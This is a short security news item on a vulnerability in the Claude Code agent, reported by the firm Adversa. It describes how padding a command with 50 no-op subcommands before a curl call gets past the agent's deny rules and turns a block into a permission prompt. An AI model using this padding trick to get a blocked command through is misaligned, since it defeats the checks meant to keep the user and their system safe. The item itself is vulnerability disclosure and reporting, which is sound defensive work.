Claude Code has a vulnerability that allows prompt injection attacks bypassing its deny rules. This issue arises when the agent is presented with a sufficiently long chain of subcommands, causing it to ignore its security protocols, as reported by The Register.The vulnerability was discovered by Adversa, a security firm, after the leak of Claude Code's source code. Claude Code uses deny rules to prevent risky actions, such as network requests via the curl command. However, a hard cap of 50 security subcommands is implemented in the "bashPermissions.ts" file. If this limit is exceeded, the agent defaults to asking the user for permission rather than denying the command. Adversa demonstrated a proof-of-concept attack by creating a command with 50 no-op subcommands followed by a curl command, which Claude Code then requested authorization for instead of blocking.While Anthropic has an internal fix using a parser called "tree-sitter," it is not yet available in public builds. Adversa suggests a simple code change could address this specific vulnerability.Source: The Register
AI/ML
Claude Code vulnerable to prompt injection due to subcommand limit
(Adobe Stock)
An In-Depth Guide to AI
Get essential knowledge and practical strategies to use AI to better your security program.
Get daily email updates
SC Media's daily must-read of the most current and pressing daily news
You can skip this ad in 5 seconds